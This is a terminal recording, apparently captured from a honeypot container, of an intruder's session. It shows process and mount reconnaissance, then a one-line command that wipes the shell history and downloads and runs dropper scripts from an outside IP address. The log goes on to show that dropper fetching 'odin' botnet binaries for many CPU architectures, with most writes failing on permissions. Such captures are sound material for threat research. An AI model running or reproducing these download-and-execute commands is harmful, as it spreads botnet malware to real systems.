{"version": 2, "width": 40, "height": 80, "timestamp": 1761546732, "env": {"SHELL": "/bin/bash", "TERM": "xterm"}}
[0.00705, "o", "To run a command as administrator (user \"root\"), use \"sudo <command>\".\r\nSee \"man sudo_root\" for details.\r\n\r\n"]
[0.011005, "o", "\u001b[?2004h\u001b]0;admin@6e484a70cb35: ~\u0007admin@6e484a70cb35:~$ "]
[6.545688, "o", "echo \"cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps\" | sh\r\n\u001b[?2004l\r"]
[6.547901, "o", "overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/UST5IGRPL7OJW2MLY35FEBYXH7:/var/lib/docker/overlay2/l/YR4XWMXPLOANZ7METBEWGEMBQI:/var/lib/docker/overlay2/l/2DEOWEWU4XGOPSPNMEQWFHRFQH:/var/lib/docker/overlay2/l/I3RPUWJAHW5OVGEHNNKEUDPTVV:/var/lib/docker/overlay2/l/YFQOPSGIISXLI2SGFTTJY56VCC:/var/lib/docker/overlay2/l/K5W4GZLDCXMEW6RLSTMB5BOW3E:/var/lib/docker/overlay2/l/YKA6SL4XIF5WMBRYHGPVHVDBTO:/var/lib/docker/overlay2/l/ZJEPNKADN27IP5KC7G2JZFBALX:/var/lib/docker/overlay2/l/7ZR5TF24DQPNLAXZT5732LV2XD:/var/lib/docker/overlay2/l/LZ4DIGAKG7V4ZOYI7LAWNUSM42:/var/lib/docker/overlay2/l/PY77IXVO3K7G5SVAGFKWMSAZAD:/var/lib/docker/overlay2/l/W6VBFVGWFHF742B2PIVHMBVX7I:/var/lib/docker/overlay2/l/K3HB4NKGNOBVMTZYXZQFPJZEUN:/var/lib/docker/overlay2/l/M2SA7HOA5RQUC4DWPLSBJQO73N:/var/lib/docker/overlay2/l/VI7DWKOEBTX4I7JUC7VISEMTXY:/var/lib/docker/overlay2/l/6GNEL24S5WPVBYTXATS7APGUPX:/var/lib/docker/overlay2/l/3EYBHHW2CYRZWUPB5NJHS4BUGC:/var/lib/docker/overlay2/l/HZMDDT5BE6NCGUHGYXUJQFNIR2,upperdir=/var/lib/docker/overlay2/e88db04cafe51efaebfa705f31a4a2b6b43d9a2519a422ce47e981ff4a93c972/diff,workdir=/var/lib/docker/overlay2/e88db04cafe51efaebfa705f31a4a2b6b43d9a2519a422ce47e981ff4a93c972/work,nouserxattr 0 0\r\nproc /proc proc rw,nosuid,nodev,noexec,relatime 0 0\r\ntmpfs /dev tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0\r\ndevpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0\r\nsysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0\r\ncgroup /sys/fs/cgroup cgroup2 ro,nosuid,nodev,noexec,relatime,nsdelegate,memory_recursiveprot 0 0\r\nmqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0\r\nshm /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k,inode64 0 0\r\n/dev/sda1 /tmp/.systemd-private ext4 rw,relatime 0 0\r\n/dev/sda1 /etc/resolv.conf ext4 rw,relatime 0 0\r\n/dev/sda1 /etc/hostname ext4 rw,relatime 0 0\r\n/dev/sda1 /etc/hosts ext4 rw,relatime 0 0\r\n/dev/sda1 /var/log/.journal ext4 rw,relatime 0 0\r\n/dev/sda1 /var/log/auth ext4 rw,relatime 0 0\r\nproc /proc/bus proc ro,nosuid,nodev,noexec,relatime 0 0\r\nproc /proc/fs proc ro,nosuid,nodev,noexec,relatime 0 0\r\nproc /proc/irq proc ro,nosuid,nodev,noexec,relatime 0 0\r\nproc /proc/sys proc ro,nosuid,nodev,noexec,relatime 0 0\r\nproc /proc/sysrq-trigger proc ro,nosuid,nodev,noexec,relatime 0 0\r\ntmpfs /proc/acpi tmpfs ro,relatime,inode64 0 0\r\ntmpfs /proc/interrupts tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0\r\ntmpfs /proc/kcore tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0\r\ntmpfs /proc/keys tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0\r\ntmpfs /proc/latency_stats tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0\r\ntmpfs /proc/timer_list tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0\r\ntmpfs /proc/scsi tmpfs ro,relatime,inode64 0 0\r\ntmpfs /sys/firmware tmpfs ro,relatime,inode64 0 0\r\n"]
[6.549586, "o", "arch_status\t    net\r\nattr\t\t    ns\r\nautogroup\t    numa_maps\r\nauxv\t\t    oom_adj\r\ncgroup\t\t    oom_score\r\nclear_refs\t    oom_score_adj\r\ncmdline\t\t    pagemap\r\ncomm\t\t    patch_state\r\ncoredump_filter     personality\r\ncpu_resctrl_groups  projid_map\r\ncpuset\t\t    root\r\ncwd\t\t    sched\r\nenviron\t\t    schedstat\r\nexe\t\t    sessionid\r\nfd\t\t    setgroups\r\nfdinfo\t\t    smaps\r\ngid_map\t\t    smaps_rollup\r\nio\t\t    stack\r\nksm_merging_pages   stat\r\nksm_stat\t    statm\r\nlatency\t\t    status\r\nlimits\t\t    syscall\r\nloginuid\t    task\r\nmap_files\t    timens_offsets\r\nmaps\t\t    timers\r\nmem\t\t    timerslack_ns\r\nmountinfo\t    uid_map\r\n"]
[6.549706, "o", "mounts\t\t    wchan\r\nmountstats\r\n"]
[6.551517, "o", "sh: 1: curl2: not found\r\n"]
[6.554098, "o", "USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND\r\n"]
[6.554245, "o", "root           1  0.0  0.0   4364  3200 ?        Ss   00:00   0:00 /bin/bash /op\r\n"]
[6.554274, "o", "syslog        13  0.0  0.0 152768  3660 ?        Ssl  00:00   0:01 rsyslogd\r\n"]
[6.554485, "o", "tcpdump       15  0.0  0.0  16476  7936 ?        S    00:00   0:02 tcpdump -i an\r\nroot          16  0.0  0.1  15440  8960 ?        S    00:00   0:00 sshd: /usr/sb\r\nroot         471  0.0  0.0   4364  1192 ?        S    00:49   0:00 /bin/bash /op\r\nroot         476  0.0  0.2 101100 20620 ?        Sl   00:49   0:00 /usr/bin/pyth\r\n"]
[6.554572, "o", "root         479  0.0  0.1  27104 13896 ?        S    00:49   0:00 /usr/bin/pyth\r\nroot         480  0.0  0.1  27116 14668 ?        S    00:49   0:00 /usr/bin/pyth\r\n"]
[6.554631, "o", "root         481  0.0  0.0   2892  1536 pts/0    Ss+  00:49   0:00 sh -c cat\r\n"]
[6.554686, "o", "root         483  0.0  0.0   3308  1664 pts/0    S+   00:49   0:00 cat\r\n"]
[6.554732, "o", "root         510  0.0  0.0   4364  1316 ?        S    00:50   0:00 /bin/bash /op\r\n"]
[6.554795, "o", "root         514  0.0  0.2 101100 20748 ?        Sl   00:50   0:00 /usr/bin/pyth\r\n"]
[6.554877, "o", "root         518  0.0  0.1  27104 13892 ?        S    00:50   0:00 /usr/bin/pyth\r\n"]
[6.554918, "o", "root         519  0.0  0.1  27116 14532 ?        S    00:50   0:00 /usr/bin/pyth\r\n"]
[6.554956, "o", "root         520  0.0  0.0   2892  1536 pts/1    Ss+  00:50   0:00 sh -c cat\r\n"]
[6.555121, "o", "root         522  0.0  0.0   3308  1664 pts/1    S+   00:50   0:00 cat\r\nroot         555  0.0  0.0   4364  1188 ?        S    00:50   0:00 /bin/bash /op\r\n"]
[6.555238, "o", "root         559  0.0  0.2 101100 20748 ?        Sl   00:50   0:00 /usr/bin/pyth\r\nroot         563  0.0  0.1  27104 14024 ?        S    00:50   0:00 /usr/bin/pyth\r\nroot         564  0.0  0.1  27116 14536 ?        S    00:50   0:00 /usr/bin/pyth\r\n"]
[6.555342, "o", "root         565  0.0  0.0   2892  1664 pts/2    Ss+  00:50   0:00 sh -c cat\r\nroot         567  0.0  0.0   3308  1664 pts/2    S+   00:50   0:00 cat\r\n"]
[6.555372, "o", "root         594  0.0  0.0   4364  1316 ?        S    00:50   0:00 /bin/bash /op\r\n"]
[6.555456, "o", "root         598  0.0  0.2 101100 20620 ?        Sl   00:50   0:00 /usr/bin/pyth\r\nroot         602  0.0  0.1  27104 14024 ?        S    00:50   0:00 /usr/bin/pyth\r\n"]
[6.555556, "o", "root         603  0.0  0.1  27116 14664 ?        S    00:50   0:00 /usr/bin/pyth\r\nroot         604  0.0  0.0   2892  1536 pts/3    Ss+  00:50   0:00 sh -c cat\r\n"]
[6.555625, "o", "root         606  0.0  0.0   3308  1536 pts/3    S+   00:50   0:00 cat\r\n"]
[6.555719, "o", "root         633  0.0  0.0   4364  1316 ?        S    00:50   0:00 /bin/bash /op\r\nroot         638  0.0  0.2 101100 20748 ?        Sl   00:50   0:00 /usr/bin/pyth\r\n"]
[6.555798, "o", "root         643  0.0  0.1  27104 14024 ?        S    00:50   0:00 /usr/bin/pyth\r\nroot         644  0.0  0.1  27116 14664 ?        S    00:50   0:00 /usr/bin/pyth\r\nroot         645  0.0  0.0   2892  1536 pts/4    Ss+  00:50   0:00 sh -c cat\r\n"]
[6.55592, "o", "root         647  0.0  0.0   3308  1536 pts/4    S+   00:50   0:00 cat\r\n"]
[6.556028, "o", "root         674  0.0  0.0   4364  1188 ?        S    00:50   0:00 /bin/bash /op\r\nroot         679  0.0  0.2 101100 20728 ?        Sl   00:50   0:00 /usr/bin/pyth\r\n"]
[6.556105, "o", "root         684  0.0  0.1  27104 13892 ?        S    00:50   0:00 /usr/bin/pyth\r\n"]
[6.556171, "o", "root         685  0.0  0.1  27116 14532 ?        S    00:50   0:00 /usr/bin/pyth\r\nroot         686  0.0  0.0   2892  1536 pts/5    Ss+  00:50   0:00 sh -c cat\r\n"]
[6.556275, "o", "root         688  0.0  0.0   3308  1664 pts/5    S+   00:50   0:00 cat\r\nroot         719  0.0  0.0   4364  1192 ?        S    00:50   0:00 /bin/bash /op\r\n"]
[6.556378, "o", "root         722  0.0  0.2 101100 20620 ?        Sl   00:50   0:00 /usr/bin/pyth\r\nroot         727  0.0  0.1  27104 13764 ?        S    00:50   0:00 /usr/bin/pyth\r\n"]
[6.556413, "o", "root         728  0.0  0.1  27116 14532 ?        S    00:50   0:00 /usr/bin/pyth\r\nroot         729  0.0  0.0   2892  1536 pts/6    Ss+  00:50   0:00 sh -c cat\r\n"]
[6.556491, "o", "root         731  0.0  0.0   3308  1536 pts/6    S+   00:50   0:00 cat\r\n"]
[6.556524, "o", "root         758  0.0  0.0   4364  1316 ?        S    00:51   0:00 /bin/bash /op\r\nroot         762  0.0  0.2 101100 20620 ?        Sl   00:51   0:00 /usr/bin/pyth\r\n"]
[6.556635, "o", "root         766  0.0  0.1  27104 13892 ?        S    00:51   0:00 /usr/bin/pyth\r\nroot         767  0.0  0.1  27116 14660 ?        S    00:51   0:00 /usr/bin/pyth\r\nroot         768  0.0  0.0   2892  1664 pts/7    Ss+  00:51   0:00 sh -c cat\r\n"]
[6.556714, "o", "root         770  0.0  0.0   3308  1536 pts/7    S+   00:51   0:00 cat\r\n"]
[6.556745, "o", "root         799  0.0  0.0   4364  1060 ?        S    00:51   0:00 /bin/bash /op\r\n"]
[6.556813, "o", "root         804  0.0  0.2 101100 20620 ?        Sl   00:51   0:00 /usr/bin/pyth\r\n"]
[6.556908, "o", "root         809  0.0  0.1  27104 13896 ?        S    00:51   0:00 /usr/bin/pyth\r\nroot         810  0.0  0.1  27116 14664 ?        S    00:51   0:00 /usr/bin/pyth\r\n"]
[6.556977, "o", "root         811  0.0  0.0   2892  1536 pts/8    Ss+  00:51   0:00 sh -c cat\r\n"]
[6.557037, "o", "root         813  0.0  0.0   3308  1664 pts/8    S+   00:51   0:00 cat\r\n"]
[6.557064, "o", "root         921  0.0  0.0   4364  1188 ?        S    00:59   0:00 /bin/bash /op\r\nroot         925  0.0  0.2 101100 20748 ?        Sl   00:59   0:00 /usr/bin/pyth\r\n"]
[6.557114, "o", "root         929  0.0  0.1  27104 13896 ?        S    00:59   0:00 /usr/bin/pyth\r\n"]
[6.557142, "o", "root         930  0.0  0.1  27116 14536 ?        S    00:59   0:00 /usr/bin/pyth\r\n"]
[6.557205, "o", "root         931  0.0  0.0   2892  1536 pts/9    Ss+  00:59   0:00 sh -c cat\r\n"]
[6.557251, "o", "root         933  0.0  0.0   3308  1536 pts/9    S+   00:59   0:00 cat\r\n"]
[6.557307, "o", "root        1004  0.0  0.0   4364  1452 ?        S    01:13   0:00 /bin/bash /op\r\nroot        1008  0.0  0.2 101100 20600 ?        Sl   01:13   0:00 /usr/bin/pyth\r\n"]
[6.557407, "o", "root        1090  0.0  0.1  27104 14020 ?        S    01:13   0:00 /usr/bin/pyth\r\n"]
[6.557531, "o", "root        1091  0.0  0.1  27116 14660 ?        S    01:13   0:00 /usr/bin/pyth\r\nroot        1092  0.0  0.0   2892  1664 pts/10   Ss+  01:13   0:00 sh -c cat\r\nroot        1094  0.0  0.0   3308  1664 pts/10   S+   01:13   0:00 cat\r\n"]
[6.557604, "o", "admin       1177  0.0  0.0   4364  1196 ?        S    01:27   0:00 /bin/bash /op\r\n"]
[6.557674, "o", "admin       1182  0.0  0.2 101100 20520 ?        Sl   01:27   0:00 /usr/bin/pyth\r\n"]
[6.557695, "o", "admin       1263  0.0  0.1  27104 13984 ?        S    01:27   0:00 /usr/bin/pyth\r\n"]
[6.55774, "o", "admin       1264  0.0  0.1  27116 14628 ?        S    01:27   0:00 /usr/bin/pyth\r\n"]
[6.557805, "o", "admin       1265  0.0  0.0   2892  1664 pts/11   Ss+  01:27   0:00 sh -c cat\r\n"]
[6.557853, "o", "admin       1267  0.0  0.0   3308  1536 pts/11   S+   01:27   0:00 cat\r\n"]
[6.557981, "o", "user        2154  0.0  0.0   4364  1324 ?        S    04:07   0:00 /bin/bash /op\r\n"]
[6.558001, "o", "user        2158  0.0  0.2 101100 20624 ?        Sl   04:07   0:00 /usr/bin/pyth\r\n"]
[6.5581, "o", "user        2240  0.0  0.1  27104 13876 ?        S    04:07   0:00 /usr/bin/pyth\r\nuser        2241  0.0  0.1  27116 14520 ?        S    04:07   0:00 /usr/bin/pyth\r\n"]
[6.558183, "o", "user        2242  0.0  0.0   2892  1536 pts/12   Ss+  04:07   0:00 sh -c cat\r\nuser        2243  0.0  0.0   3308  1536 pts/12   S+   04:07   0:00 cat\r\n"]
[6.558253, "o", "root        2310  0.0  0.0   4364  1192 ?        S    04:16   0:00 /bin/bash /op\r\n"]
[6.558357, "o", "root        2315  0.0  0.2 101100 20492 ?        Sl   04:16   0:00 /usr/bin/pyth\r\nroot        2318  0.0  0.1  27104 13892 ?        S    04:16   0:00 /usr/bin/pyth\r\n"]
[6.558391, "o", "root        2319  0.0  0.1  27116 14660 ?        S    04:16   0:00 /usr/bin/pyth\r\n"]
[6.558409, "o", "root        2320  0.0  0.0   2892  1536 pts/13   Ss+  04:16   0:00 sh -c cat\r\n"]
[6.558504, "o", "root        2322  0.0  0.0   3308  1536 pts/13   S+   04:16   0:00 cat\r\n"]
[6.558574, "o", "root        2349  0.0  0.0   4364  1316 ?        S    04:16   0:00 /bin/bash /op\r\nroot        2354  0.0  0.2 101100 20496 ?        Sl   04:16   0:00 /usr/bin/pyth\r\n"]
[6.558628, "o", "root        2357  0.0  0.1  27104 13896 ?        S    04:16   0:00 /usr/bin/pyth\r\n"]
[6.558653, "o", "root        2358  0.0  0.1  27116 14408 ?        S    04:16   0:00 /usr/bin/pyth\r\n"]
[6.558722, "o", "root        2359  0.0  0.0   2892  1536 pts/14   Ss+  04:16   0:00 sh -c cat\r\nroot        2361  0.0  0.0   3308  1664 pts/14   S+   04:16   0:00 cat\r\n"]
[6.558783, "o", "root        2388  0.0  0.0   4364  1316 ?        S    04:16   0:00 /bin/bash /op\r\n"]
[6.558863, "o", "root        2392  0.0  0.2 101100 20744 ?        Sl   04:16   0:00 /usr/bin/pyth\r\n"]
[6.558902, "o", "root        2396  0.0  0.1  27104 14020 ?        S    04:16   0:00 /usr/bin/pyth\r\nroot        2397  0.0  0.1  27116 14660 ?        S    04:16   0:00 /usr/bin/pyth\r\n"]
[6.558997, "o", "root        2398  0.0  0.0   2892  1664 pts/15   Ss+  04:16   0:00 sh -c cat\r\nroot        2400  0.0  0.0   3308  1536 pts/15   S+   04:16   0:00 cat\r\n"]
[6.559075, "o", "root        2427  0.0  0.0   4364  1188 ?        S    04:16   0:00 /bin/bash /op\r\n"]
[6.559163, "o", "root        2431  0.0  0.2 101100 20620 ?        Sl   04:16   0:00 /usr/bin/pyth\r\nroot        2461  0.0  0.0   4364  1188 ?        S    04:16   0:00 /bin/bash /op\r\n"]
[6.559238, "o", "root        2466  0.0  0.2 101100 20620 ?        Sl   04:16   0:00 /usr/bin/pyth\r\n"]
[6.559267, "o", "root        2471  0.0  0.1  27104 13892 ?        S    04:16   0:00 /usr/bin/pyth\r\nroot        2472  0.0  0.1  27116 14532 ?        S    04:16   0:00 /usr/bin/pyth\r\n"]
[6.559331, "o", "root        2473  0.0  0.0   2892  1536 pts/16   Ss+  04:16   0:00 sh -c cat\r\n"]
[6.559379, "o", "root        2475  0.0  0.0   3308  1536 pts/16   S+   04:16   0:00 cat\r\n"]
[6.559445, "o", "root        2476  0.0  0.1  27104 14024 ?        S    04:16   0:00 /usr/bin/pyth\r\n"]
[6.559517, "o", "root        2477  0.0  0.1  27116 14664 ?        S    04:16   0:00 /usr/bin/pyth\r\nroot        2478  0.0  0.0   2892  1536 pts/17   Ss+  04:16   0:00 sh -c cat\r\n"]
[6.559604, "o", "root        2480  0.0  0.0   3308  1792 pts/17   S+   04:16   0:00 cat\r\nroot        2507  0.0  0.0   4364  1188 ?        S    04:17   0:00 /bin/bash /op\r\n"]
[6.559633, "o", "root        2512  0.0  0.2 101100 20748 ?        Sl   04:17   0:00 /usr/bin/pyth\r\n"]
[6.559727, "o", "root        2517  0.0  0.1  27104 13872 ?        S    04:17   0:00 /usr/bin/pyth\r\nroot        2518  0.0  0.1  27116 14512 ?        S    04:17   0:00 /usr/bin/pyth\r\n"]
[6.559765, "o", "root        2519  0.0  0.0   2892  1664 pts/18   Ss+  04:17   0:00 sh -c cat\r\n"]
[6.559852, "o", "root        2521  0.0  0.0   3308  1664 pts/18   S+   04:17   0:00 cat\r\nroot        2548  0.0  0.0   4364  1196 ?        S    04:17   0:00 /bin/bash /op\r\n"]
[6.559888, "o", "root        2551  0.0  0.2 101100 20776 ?        Sl   04:17   0:00 /usr/bin/pyth\r\n"]
[6.559959, "o", "root        2556  0.0  0.1  27104 13896 ?        S    04:17   0:00 /usr/bin/pyth\r\n"]
[6.56006, "o", "root        2557  0.0  0.1  27116 14536 ?        S    04:17   0:00 /usr/bin/pyth\r\nroot        2558  0.0  0.0   2892  1536 pts/19   Ss+  04:17   0:00 sh -c cat\r\n"]
[6.560175, "o", "root        2560  0.0  0.0   3308  1664 pts/19   S+   04:17   0:00 cat\r\nroot        2587  0.0  0.0   4364  1316 ?        S    04:17   0:00 /bin/bash /op\r\n"]
[6.560231, "o", "root        2591  0.0  0.2 101100 20492 ?        Sl   04:17   0:00 /usr/bin/pyth\r\n"]
[6.56026, "o", "root        2595  0.0  0.1  27104 13976 ?        S    04:17   0:00 /usr/bin/pyth\r\nroot        2596  0.0  0.1  27116 14616 ?        S    04:17   0:00 /usr/bin/pyth\r\n"]
[6.560334, "o", "root        2597  0.0  0.0   2892  1664 pts/20   Ss+  04:17   0:00 sh -c cat\r\n"]
[6.560508, "o", "root        2599  0.0  0.0   3308  1536 pts/20   S+   04:17   0:00 cat\r\nroot        2626  0.0  0.0   4364  1316 ?        S    04:17   0:00 /bin/bash /op\r\nroot        2631  0.0  0.2 101100 20492 ?        Sl   04:17   0:00 /usr/bin/pyth\r\n"]
[6.5606, "o", "root        2636  0.0  0.1  27104 14024 ?        S    04:17   0:00 /usr/bin/pyth\r\nroot        2637  0.0  0.1  27116 14664 ?        S    04:17   0:00 /usr/bin/pyth\r\n"]
[6.560681, "o", "root        2638  0.0  0.0   2892  1536 pts/21   Ss+  04:17   0:00 sh -c cat\r\n"]
[6.560757, "o", "root        2640  0.0  0.0   3308  1664 pts/21   S+   04:17   0:00 cat\r\n"]
[6.560834, "o", "root        2685  0.0  0.0   4364  1452 ?        S    04:21   0:00 /bin/bash /op\r\nroot        2689  0.0  0.2 101100 20624 ?        Sl   04:21   0:00 /usr/bin/pyth\r\nroot        2771  0.0  0.1  27104 13892 ?        S    04:21   0:00 /usr/bin/pyth\r\n"]
[6.560895, "o", "root        2772  0.0  0.1  27116 14660 ?        S    04:21   0:00 /usr/bin/pyth\r\n"]
[6.560994, "o", "root        2773  0.0  0.0   2892  1664 pts/22   Ss+  04:21   0:00 sh -c cat\r\nroot        2775  0.0  0.0   3308  1664 pts/22   S+   04:21   0:00 cat\r\n"]
[6.561137, "o", "admin       2877  0.0  0.0   4364  1324 ?        S    04:34   0:00 /bin/bash /op\r\nadmin       2881  0.0  0.2 101100 20688 ?        Sl   04:34   0:00 /usr/bin/pyth\r\nadmin       2963  0.0  0.1  27104 14020 ?        S    04:34   0:00 /usr/bin/pyth\r\nadmin       2964  0.0  0.1  27116 14660 ?        S    04:34   0:00 /usr/bin/pyth\r\n"]
[6.561251, "o", "admin       2965  0.0  0.0   2892  1536 pts/23   Ss+  04:34   0:00 sh -c cat\r\nadmin       2967  0.0  0.0   3308  1536 pts/23   S+   04:34   0:00 cat\r\n"]
[6.561356, "o", "root        3485  1.5  0.1  20724 14248 ?        Ss   06:17   0:13 sshd: root\r\nroot        3551  0.0  0.1  27104 13892 ?        S    06:19   0:00 /usr/bin/pyth\r\n"]
[6.561436, "o", "root        3552  0.0  0.1  27116 14532 ?        S    06:19   0:00 /usr/bin/pyth\r\n"]
[6.561517, "o", "root        3593  0.0  0.1  16988 10676 ?        Ss   06:28   0:00 sshd: root@pt\r\nroot        3605  0.1  0.2 101088 20592 pts/25   Ssl+ 06:28   0:00 /usr/bin/pyth\r\n"]
[6.561567, "o", "root        3630  0.0  0.0      0     0 pts/25   Z+   06:28   0:00 [alert.sh] <d\r\n"]
[6.561652, "o", "root        3635  0.0  0.1  27092 14012 pts/25   S+   06:28   0:00 /usr/bin/pyth\r\n"]
[6.561722, "o", "root        3636  0.0  0.1  27104 14652 pts/25   S+   06:28   0:00 /usr/bin/pyth\r\nroot        3637  0.0  0.0   2892  1536 pts/26   Ss   06:28   0:00 sh -c /bin/ba\r\n"]
[6.561827, "o", "root        3638  0.0  0.0   5004  3840 pts/26   S+   06:28   0:00 /bin/bash\r\nroot        3698  0.0  0.0    328     0 ?        Ss   06:29   0:00 ./odin.x64\r\n"]
[6.561914, "o", "root        3887  0.0  0.1  16724 10412 ?        Ss   06:30   0:00 sshd: admin [\r\n"]
[6.561955, "o", "admin       3903  0.0  0.1  16984  8160 ?        S    06:31   0:00 sshd: admin@p\r\nadmin       3906  1.7  0.2 101088 20508 pts/24   Rsl+ 06:32   0:00 /usr/bin/pyth\r\n"]
[6.562104, "o", "admin       3931  0.0  0.0      0     0 pts/24   Z+   06:32   0:00 [alert.sh] <d\r\nadmin       3934  0.0  0.1  27092 13880 pts/24   S+   06:32   0:00 /usr/bin/pyth\r\nadmin       3935  0.0  0.1  27104 14520 pts/24   R+   06:32   0:00 /usr/bin/pyth\r\n"]
[6.562131, "o", "admin       3936  0.0  0.0   2892  1536 pts/27   Ss   06:32   0:00 sh -c /bin/ba\r\n"]
[6.562221, "o", "admin       3937  0.0  0.0   5004  3840 pts/27   S    06:32   0:00 /bin/bash\r\n"]
[6.562363, "o", "admin       3943  0.0  0.0   2892  1536 pts/27   S+   06:32   0:00 sh\r\nadmin       3946  0.0  0.0   7440  3072 pts/27   R+   06:32   0:00 ps aux\r\n"]
[6.571122, "o", "    PID TTY          TIME CMD\r\n"]
[6.571248, "o", "   3936 pts/27   00:00:00 sh\r\n"]
[6.571307, "o", "   3937 pts/27   00:00:00 bash\r\n   3943 pts/27   00:00:00 sh\r\n"]
[6.571374, "o", "   3947 pts/27   00:00:00 ps\r\n"]
[6.571951, "o", "\u001b[?2004h\u001b]0;admin@6e484a70cb35: ~\u0007admin@6e484a70cb35:~$ \r\n\u001b[?2004l\r"]
[6.572033, "o", "\u001b[?2004h\u001b]0;admin@6e484a70cb35: ~\u0007admin@6e484a70cb35:~$ "]
[11.81405, "o", "echo \"history -cw; cd /tmp; rm -rf *.sh; rm -rf bizy*; rm -rf odin*; wget http://91.92.241.59/wget.sh; sh wget.sh; curl http://91.92.241.59/curl.sh -o curl.sh; sh curl.sh | sh\" | sh\r\n\u001b[?2004l\r"]
[11.815447, "o", "sh: 1: history: not found\r\n"]
[11.819686, "o", "rm: cannot remove 'odin.arm': Operation not permitted\r\nrm: cannot remove 'odin.arm5': Operation not permitted\r\nrm: cannot remove 'odin.arm5n': Operation not permitted\r\nrm: cannot remove 'odin.arm6': Operation not permitted\r\nrm: cannot remove 'odin.arm7': Operation not permitted\r\n"]
[11.819866, "o", "rm: cannot remove 'odin.m68k': Operation not permitted\r\nrm: cannot remove 'odin.mips': Operation not permitted\r\nrm: cannot remove 'odin.mpsl': Operation not permitted\r\nrm: cannot remove 'odin.ppc': Operation not permitted\r\n"]
[11.819922, "o", "rm: cannot remove 'odin.sh4': Operation not permitted\r\nrm: cannot remove 'odin.spc': Operation not permitted\r\nrm: cannot remove 'odin.x64': Operation not permitted\r\nrm: cannot remove 'odin.x86': Operation not permitted\r\n"]
[11.824541, "o", "--2025-10-27 06:32:24--  http://91.92.241.59/wget.sh\r\nConnecting to 91.92.241.59:80... "]
[11.866271, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[11.908084, "o", "200 OK\r\nLength: 2458 (2.4K) [application/x-shellscript]\r\n"]
[11.908275, "o", "Saving to: ‘wget.sh’\r\n\r\n\rwget.sh        0%       0  --.-KB/s               "]
[11.908436, "o", "\rwget.sh      100%   2.40K  --.-KB/s    in 0s      \r\n\r\n2025-10-27 06:32:24 (261 MB/s) - ‘wget.sh’ saved [2458/2458]\r\n\r\n"]
[11.909986, "o", "wget.sh: 3: ulimit: error setting limit (Operation not permitted)\r\nwget.sh: 5: cannot create .x: Permission denied\r\n"]
[11.910489, "o", "wget.sh: 5: cannot create .x: Permission denied\r\n"]
[11.91144, "o", "wget.sh: 5: cannot create .x: Permission denied\r\nwget.sh: 5: cd: "]
[11.911516, "o", "can't cd to /root\r\n"]
[11.911855, "o", "wget.sh: 5: cannot create .x: Permission denied\r\n"]
[11.912219, "o", "wget.sh: 5: cannot create .x: Permission denied\r\n"]
[11.916635, "o", "--2025-10-27 06:32:24--  http://91.92.241.59/odin.arm\r\nConnecting to 91.92.241.59:80... "]
[11.957895, "o", "connected.\r\n"]
[11.957935, "o", "HTTP request sent, awaiting response... "]
[11.999597, "o", "200 OK\r\nLength: 129568 (127K) [application/octet-stream]\r\nodin.arm: Permission denied\r\n\r\nCannot write to ‘odin.arm’ (No such file or directory).\r\n"]
[12.001223, "o", "chmod: cannot access 'odin.arm': No such file or directory\r\n"]
[12.00151, "o", "wget.sh: 10: ./odin.arm: not found\r\n"]
[12.003787, "o", "--2025-10-27 06:32:24--  http://91.92.241.59/odin.arm5\r\nConnecting to 91.92.241.59:80... "]
[12.044899, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[12.088427, "o", "200 OK\r\nLength: 125472 (123K) [application/octet-stream]\r\nodin.arm5: Permission denied\r\n\r\nCannot write to ‘odin.arm5’ (No such file or directory).\r\n"]
[12.089437, "o", "chmod: cannot access 'odin.arm5': No such file or directory\r\n"]
[12.089622, "o", "wget.sh: 11: ./odin.arm5: not found\r\n"]
[12.092007, "o", "--2025-10-27 06:32:25--  http://91.92.241.59/odin.arm5n\r\nConnecting to 91.92.241.59:80... "]
[12.16631, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[12.210224, "o", "200 OK\r\nLength: 44912 (44K) [application/octet-stream]\r\nodin.arm5n: Permission denied\r\n\r\nCannot write to ‘odin.arm5n’ (No such file or directory).\r\n"]
[12.212054, "o", "chmod: cannot access 'odin.arm5n': No such file or directory\r\n"]
[12.212305, "o", "wget.sh: 12: ./odin.arm5n: not found\r\n"]
[12.214641, "o", "--2025-10-27 06:32:25--  http://91.92.241.59/odin.arm6\r\nConnecting to 91.92.241.59:80... "]
[12.255781, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[12.320876, "o", "200 OK\r\nLength: 141180 (138K) [application/octet-stream]\r\nodin.arm6: Permission denied\r\n"]
[12.321053, "o", "\r\nCannot write to ‘odin.arm6’ (No such file or directory).\r\n"]
[12.322169, "o", "chmod: cannot access 'odin.arm6': No such file or directory\r\n"]
[12.322477, "o", "wget.sh: 13: ./odin.arm6: not found\r\n"]
[12.324637, "o", "--2025-10-27 06:32:25--  http://91.92.241.59/odin.arm7\r\nConnecting to 91.92.241.59:80... "]
[12.365799, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[12.407054, "o", "200 OK\r\nLength: 176104 (172K) [application/octet-stream]\r\nodin.arm7: Permission denied\r\n"]
[12.407117, "o", "\r\nCannot write to ‘odin.arm7’ (No such file or directory).\r\n"]
[12.408515, "o", "chmod: cannot access 'odin.arm7': No such file or directory\r\n"]
[12.408706, "o", "wget.sh: 14: ./odin.arm7: not found\r\n"]
[12.411323, "o", "--2025-10-27 06:32:25--  http://91.92.241.59/odin.m68k\r\nConnecting to 91.92.241.59:80... "]
[12.452657, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[12.494113, "o", "200 OK\r\nLength: 144512 (141K) [application/octet-stream]\r\nodin.m68k: Permission denied\r\n\r\nCannot write to ‘odin.m68k’ (No such file or directory).\r\n"]
[12.496167, "o", "chmod: cannot access 'odin.m68k': No such file or directory\r\n"]
